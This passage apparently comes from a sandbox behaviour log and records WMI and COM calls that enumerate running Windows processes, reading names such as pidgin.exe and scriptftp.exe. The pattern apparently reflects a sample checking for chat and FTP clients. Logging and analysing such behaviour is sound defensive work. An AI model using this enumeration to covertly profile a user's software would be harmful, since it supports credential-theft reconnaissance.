pToken=0x38df58 | out: pToken=0x38df58) returned 0x0 [0214.682] CoGetContextToken (in: pToken=0x38e36c | out: pToken=0x38e36c) returned 0x0 [0214.682] IUnknown:QueryInterface (in: This=0x562fb80, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e3ec | out: ppvObject=0x38e3ec*=0x0) returned 0x80004002 [0214.682] IUnknown:Release (This=0x562fb80) returned 0x2 [0214.682] CoGetContextToken (in: pToken=0x38e954 | out: pToken=0x38e954) returned 0x0 [0214.682] CoGetContextToken (in: pToken=0x38e8b4 | out: pToken=0x38e8b4) returned 0x0 [0214.682] IUnknown:QueryInterface (in: This=0x562fb80, riid=0x38e984*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x38e980 | out: ppvObject=0x38e980*=0x562fb80) returned 0x0 [0214.682] IUnknown:AddRef (This=0x562fb80) returned 0x4 [0214.682] IUnknown:Release (This=0x562fb80) returned 0x3 [0214.682] IUnknown:Release (This=0x562fb80) returned 0x2 [0214.682] CoTaskMemFree (pv=0x5632128) [0214.682] CoGetContextToken (in: pToken=0x38ecc4 | out: pToken=0x38ecc4) returned 0x0 [0214.682] IUnknown:AddRef (This=0x562fb80) returned 0x3 [0214.682] IWbemClassObject:Get (in: This=0x562fb80, wszName="__GENUS", lFlags=0, pVal=0x38efc4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38f044*=0, plFlavor=0x38f040*=0 | out: pVal=0x38efc4*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x38f044*=3, plFlavor=0x38f040*=64) returned 0x0 [0214.683] IWbemClassObject:Get (in: This=0x562fb80, wszName="__PATH", lFlags=0, pVal=0x38efa8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38f02c*=0, plFlavor=0x38f028*=0 | out: pVal=0x38efa8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2284\"", varVal2=0x0), pType=0x38f02c*=8, plFlavor=0x38f028*=64) returned 0x0 [0214.683] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2284\"") returned 0x66 [0214.683] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2284\"") returned 0x66 [0214.683] CoGetObjectContext (in: riid=0x25c02c4*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38efd4 | out: ppv=0x38efd4*=0x6d0cac) returned 0x0 [0214.683] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6d0cac, pAptType=0x38efcc | out: pAptType=0x38efcc*=1) returned 0x0 [0214.683] IUnknown:QueryInterface (in: This=0x6d0cac, riid=0x25c02ac*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x38efd0 | out: ppvObject=0x38efd0*=0x0) returned 0x80004002 [0214.683] IUnknown:Release (This=0x6d0cac) returned 0x1 [0214.684] CoGetClassObject (in: rclsid=0x55b3f5c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x72656bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38e940 | out: ppv=0x38e940*=0x5632128) returned 0x0 [0214.684] WbemDefPath:IUnknown:QueryInterface (in: This=0x5632128, riid=0x7261dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x38eb58 | out: ppvObject=0x38eb58*=0x0) returned 0x80004002 [0214.684] WbemDefPath:IClassFactory:CreateInstance (in: This=0x5632128, pUnkOuter=0x0, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38eb64 | out: ppvObject=0x38eb64*=0x5631658) returned 0x0 [0214.684] WbemDefPath:IUnknown:Release (This=0x5632128) returned 0x0 [0214.684] WbemDefPath:IUnknown:QueryInterface (in: This=0x5631658, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e784 | out: ppvObject=0x38e784*=0x5631658) returned 0x0 [0214.684] WbemDefPath:IUnknown:QueryInterface (in: This=0x5631658, riid=0x725f1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x38e738 | out: ppvObject=0x38e738*=0x0) returned 0x80004002 [0214.685] WbemDefPath:IUnknown:AddRef (This=0x5631658) returned 0x3 [0214.685] WbemDefPath:IUnknown:QueryInterface (in: This=0x5631658, riid=0x725f182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x38e094 | out: ppvObject=0x38e094*=0x0) returned 0x80004002 [0214.685] WbemDefPath:IUnknown:QueryInterface (in: This=0x5631658, riid=0x725f1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x38e044 | out: ppvObject=0x38e044*=0x0) returned 0x80004002 [0214.685] WbemDefPath:IUnknown:QueryInterface (in: This=0x5631658, riid=0x72521388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e050 | out: ppvObject=0x38e050*=0x5632138) returned 0x0 [0214.685] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5632138, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x38e058 | out: pCid=0x38e058*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0214.685] WbemDefPath:IUnknown:Release (This=0x5632138) returned 0x3 [0214.685] CoGetContextToken (in: pToken=0x38e0b0 | out: pToken=0x38e0b0) returned 0x0 [0214.685] CoGetContextToken (in: pToken=0x38e4c4 | out: pToken=0x38e4c4) returned 0x0 [0214.685] WbemDefPath:IUnknown:QueryInterface (in: This=0x5631658, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e544 | out: ppvObject=0x38e544*=0x0) returned 0x80004002 [0214.685] WbemDefPath:IUnknown:Release (This=0x5631658) returned 0x2 [0214.685] WbemDefPath:IUnknown:Release (This=0x5631658) returned 0x1 [0214.685] CoGetContextToken (in: pToken=0x38ee54 | out: pToken=0x38ee54) returned 0x0 [0214.685] CoGetContextToken (in: pToken=0x38edb4 | out: pToken=0x38edb4) returned 0x0 [0214.685] WbemDefPath:IUnknown:QueryInterface (in: This=0x5631658, riid=0x38ee84*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x38ee80 | out: ppvObject=0x38ee80*=0x5631658) returned 0x0 [0214.685] WbemDefPath:IUnknown:AddRef (This=0x5631658) returned 0x3 [0214.685] WbemDefPath:IUnknown:Release (This=0x5631658) returned 0x2 [0214.685] WbemDefPath:IWbemPath:SetText (This=0x5631658, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2284\"") returned 0x0 [0214.685] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x53abde8, puCount=0x38f000 | out: puCount=0x38f000*=0x2) returned 0x0 [0214.686] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38effc*=0x0, pszText=0x0 | out: puBuffLength=0x38effc*=0xf, pszText=0x0) returned 0x0 [0214.686] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38effc*=0xf, pszText="00000000000000" | out: puBuffLength=0x38effc*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0214.686] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x53abde8, puCount=0x38efcc | out: puCount=0x38efcc*=0x2) returned 0x0 [0214.686] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38efc8*=0x0, pszText=0x0 | out: puBuffLength=0x38efc8*=0xf, pszText=0x0) returned 0x0 [0214.686] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38efc8*=0xf, pszText="00000000000000" | out: puBuffLength=0x38efc8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0214.686] IWbemClassObject:Get (in: This=0x562fb80, wszName="Name", lFlags=0, pVal=0x38efc8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2697684*=0, plFlavor=0x2697688*=0 | out: pVal=0x38efc8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="pidgin.exe", varVal2=0x0), pType=0x2697684*=8, plFlavor=0x2697688*=0) returned 0x0 [0214.686] SysStringByteLen (bstr="pidgin.exe") returned 0x14 [0214.686] SysStringByteLen (bstr="pidgin.exe") returned 0x14 [0214.686] IWbemClassObject:Get (in: This=0x562fb80, wszName="Name", lFlags=0, pVal=0x38efd0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2697684*=8, plFlavor=0x2697688*=0 | out: pVal=0x38efd0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="pidgin.exe", varVal2=0x0), pType=0x2697684*=8, plFlavor=0x2697688*=0) returned 0x0 [0214.686] SysStringByteLen (bstr="pidgin.exe") returned 0x14 [0214.686] SysStringByteLen (bstr="pidgin.exe") returned 0x14 [0214.686] CoTaskMemAlloc (cb=0x4) returned 0x5632168 [0214.686] IEnumWbemClassObject:Next (in: This=0x544f098, lTimeout=-1, uCount=0x1, apObjects=0x5632168, puReturned=0x267acc0 | out: apObjects=0x5632168*=0x56357b0, puReturned=0x267acc0*=0x1) returned 0x0 [0214.724] IUnknown:QueryInterface (in: This=0x56357b0, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e62c | out: ppvObject=0x38e62c*=0x56357b0) returned 0x0 [0214.725] IUnknown:QueryInterface (in: This=0x56357b0, riid=0x725f1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x38e5e0 | out: ppvObject=0x38e5e0*=0x0) returned 0x80004002 [0214.725] IUnknown:QueryInterface (in: This=0x56357b0, riid=0x725f1e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x38e408 | out: ppvObject=0x38e408*=0x0) returned 0x80004002 [0214.725] IUnknown:AddRef (This=0x56357b0) returned 0x3 [0214.725] IUnknown:QueryInterface (in: This=0x56357b0, riid=0x725f182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x38df3c | out: ppvObject=0x38df3c*=0x0) returned 0x80004002 [0214.725] IUnknown:QueryInterface (in: This=0x56357b0, riid=0x725f1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x38deec | out: ppvObject=0x38deec*=0x0) returned 0x80004002 [0214.725] IUnknown:QueryInterface (in: This=0x56357b0, riid=0x72521388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38def8 | out: ppvObject=0x38def8*=0x56357b4) returned 0x0 [0214.725] IMarshal:GetUnmarshalClass (in: This=0x56357b4, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x38df00 | out: pCid=0x38df00*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0214.725] IUnknown:Release (This=0x56357b4) returned 0x3 [0214.725] CoGetContextToken (in: pToken=0x38df58 | out: pToken=0x38df58) returned 0x0 [0214.725] CoGetContextToken (in: pToken=0x38e36c | out: pToken=0x38e36c) returned 0x0 [0214.725] IUnknown:QueryInterface (in: This=0x56357b0, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e3ec | out: ppvObject=0x38e3ec*=0x0) returned 0x80004002 [0214.725] IUnknown:Release (This=0x56357b0) returned 0x2 [0214.725] CoGetContextToken (in: pToken=0x38e954 | out: pToken=0x38e954) returned 0x0 [0214.725] CoGetContextToken (in: pToken=0x38e8b4 | out: pToken=0x38e8b4) returned 0x0 [0214.725] IUnknown:QueryInterface (in: This=0x56357b0, riid=0x38e984*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x38e980 | out: ppvObject=0x38e980*=0x56357b0) returned 0x0 [0214.725] IUnknown:AddRef (This=0x56357b0) returned 0x4 [0214.725] IUnknown:Release (This=0x56357b0) returned 0x3 [0214.726] IUnknown:Release (This=0x56357b0) returned 0x2 [0214.726] CoTaskMemFree (pv=0x5632168) [0214.726] CoGetContextToken (in: pToken=0x38ecc4 | out: pToken=0x38ecc4) returned 0x0 [0214.726] IUnknown:AddRef (This=0x56357b0) returned 0x3 [0214.726] IWbemClassObject:Get (in: This=0x56357b0, wszName="__GENUS", lFlags=0, pVal=0x38efc4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38f044*=0, plFlavor=0x38f040*=0 | out: pVal=0x38efc4*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x38f044*=3, plFlavor=0x38f040*=64) returned 0x0 [0214.726] IWbemClassObject:Get (in: This=0x56357b0, wszName="__PATH", lFlags=0, pVal=0x38efa8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38f02c*=0, plFlavor=0x38f028*=0 | out: pVal=0x38efa8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2268\"", varVal2=0x0), pType=0x38f02c*=8, plFlavor=0x38f028*=64) returned 0x0 [0214.726] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2268\"") returned 0x66 [0214.726] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2268\"") returned 0x66 [0214.726] CoGetObjectContext (in: riid=0x25c02c4*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38efd4 | out: ppv=0x38efd4*=0x6d0cac) returned 0x0 [0214.726] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6d0cac, pAptType=0x38efcc | out: pAptType=0x38efcc*=1) returned 0x0 [0214.727] IUnknown:QueryInterface (in: This=0x6d0cac, riid=0x25c02ac*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x38efd0 | out: ppvObject=0x38efd0*=0x0) returned 0x80004002 [0214.727] IUnknown:Release (This=0x6d0cac) returned 0x1 [0214.727] CoGetClassObject (in: rclsid=0x55b3f5c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x72656bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38e940 | out: ppv=0x38e940*=0x5632168) returned 0x0 [0214.728] WbemDefPath:IUnknown:QueryInterface (in: This=0x5632168, riid=0x7261dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x38eb58 | out: ppvObject=0x38eb58*=0x0) returned 0x80004002 [0214.728] WbemDefPath:IClassFactory:CreateInstance (in: This=0x5632168, pUnkOuter=0x0, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38eb64 | out: ppvObject=0x38eb64*=0x5631738) returned 0x0 [0214.728] WbemDefPath:IUnknown:Release (This=0x5632168) returned 0x0 [0214.728] WbemDefPath:IUnknown:QueryInterface (in: This=0x5631738, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e784 | out: ppvObject=0x38e784*=0x5631738) returned 0x0 [0214.728] WbemDefPath:IUnknown:QueryInterface (in: This=0x5631738, riid=0x725f1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x38e738 | out: ppvObject=0x38e738*=0x0) returned 0x80004002 [0214.728] WbemDefPath:IUnknown:AddRef (This=0x5631738) returned 0x3 [0214.728] WbemDefPath:IUnknown:QueryInterface (in: This=0x5631738, riid=0x725f182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x38e094 | out: ppvObject=0x38e094*=0x0) returned 0x80004002 [0214.728] WbemDefPath:IUnknown:QueryInterface (in: This=0x5631738, riid=0x725f1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x38e044 | out: ppvObject=0x38e044*=0x0) returned 0x80004002 [0214.728] WbemDefPath:IUnknown:QueryInterface (in: This=0x5631738, riid=0x72521388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e050 | out: ppvObject=0x38e050*=0x5632178) returned 0x0 [0214.728] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5632178, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x38e058 | out: pCid=0x38e058*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0214.728] WbemDefPath:IUnknown:Release (This=0x5632178) returned 0x3 [0214.728] CoGetContextToken (in: pToken=0x38e0b0 | out: pToken=0x38e0b0) returned 0x0 [0214.728] CoGetContextToken (in: pToken=0x38e4c4 | out: pToken=0x38e4c4) returned 0x0 [0214.728] WbemDefPath:IUnknown:QueryInterface (in: This=0x5631738, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e544 | out: ppvObject=0x38e544*=0x0) returned 0x80004002 [0214.728] WbemDefPath:IUnknown:Release (This=0x5631738) returned 0x2 [0214.728] WbemDefPath:IUnknown:Release (This=0x5631738) returned 0x1 [0214.729] CoGetContextToken (in: pToken=0x38ee54 | out: pToken=0x38ee54) returned 0x0 [0214.729] CoGetContextToken (in: pToken=0x38edb4 | out: pToken=0x38edb4) returned 0x0 [0214.729] WbemDefPath:IUnknown:QueryInterface (in: This=0x5631738, riid=0x38ee84*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x38ee80 | out: ppvObject=0x38ee80*=0x5631738) returned 0x0 [0214.729] WbemDefPath:IUnknown:AddRef (This=0x5631738) returned 0x3 [0214.729] WbemDefPath:IUnknown:Release (This=0x5631738) returned 0x2 [0214.729] WbemDefPath:IWbemPath:SetText (This=0x5631738, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2268\"") returned 0x0 [0214.729] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x53abde8, puCount=0x38f000 | out: puCount=0x38f000*=0x2) returned 0x0 [0214.729] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38effc*=0x0, pszText=0x0 | out: puBuffLength=0x38effc*=0xf, pszText=0x0) returned 0x0 [0214.729] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38effc*=0xf, pszText="00000000000000" | out: puBuffLength=0x38effc*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0214.729] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x53abde8, puCount=0x38efcc | out: puCount=0x38efcc*=0x2) returned 0x0 [0214.729] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38efc8*=0x0, pszText=0x0 | out: puBuffLength=0x38efc8*=0xf, pszText=0x0) returned 0x0 [0214.729] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38efc8*=0xf, pszText="00000000000000" | out: puBuffLength=0x38efc8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0214.729] IWbemClassObject:Get (in: This=0x56357b0, wszName="Name", lFlags=0, pVal=0x38efc8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2697ef0*=0, plFlavor=0x2697ef4*=0 | out: pVal=0x38efc8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="scriptftp.exe", varVal2=0x0), pType=0x2697ef0*=8, plFlavor=0x2697ef4*=0) returned 0x0 [0214.729] SysStringByteLen (bstr="scriptftp.exe") returned 0x1a [0214.729] SysStringByteLen (bstr="scriptftp.exe") returned 0x1a [0214.729] IWbemClassObject:Get (in: This=0x56357b0, wszName="Name", lFlags=0, pVal=0x38efd0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2697ef0*=8, plFlavor=0x2697ef4*=0 | out: pVal=0x38efd0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="scriptftp.exe", varVal2=0x0), pType=0x2697ef0*=8, plFlavor=0x2697ef4*=0) returned 0x0 [0214.729] SysStringByteLen (bstr="scriptftp.exe") returned 0x1a [0214.729] SysStringByteLen (bstr="scriptftp.exe") returned 0x1a [0214.729] CoTaskMemAlloc (cb=0x4) returned 0x56321a8 [0214.730] IEnumWbemClassObject:Next (in: This=0x544f098, lTimeout=-1, uCount=0x1, apObjects=0x56321a8, puReturned=0x267acc0 | out: apObjects=0x56321a8*=0x5635948, puReturned=0x267acc0*=0x1) returned 0x0 [0214.730] IUnknown:QueryInterface (in: This=0x5635948, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e62c | out: ppvObject=0x38e62c*=0x5635948) returned 0x0 [0214.731] IUnknown:QueryInterface (in: This=0x5635948, riid=0x725f1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x38e5e0 | out: ppvObject=0x38e5e0*=0x0) returned 0x80004002 [0214.731] IUnknown:QueryInterface (in: This=0x5635948, riid=0x725f1e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x38e408 | out: ppvObject=0x38e408*=0x0) returned 0x80004002 [0214.731] IUnknown:AddRef (This=0x5635948) returned 0x3 [0214.731] IUnknown:QueryInterface (in: This=0x5635948, riid=0x725f182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x38df3c | out: ppvObject=0x38df3c*=0x0) returned 0x80004002 [0214.731] IUnknown:QueryInterface (in: This=0x5635948, riid=0x725f1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x38deec | out: ppvObject=0x38deec*=0x0) returned 0x80004002 [0214.731] IUnknown:QueryInterface (in: This=0x5635948, riid=0x72521388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, 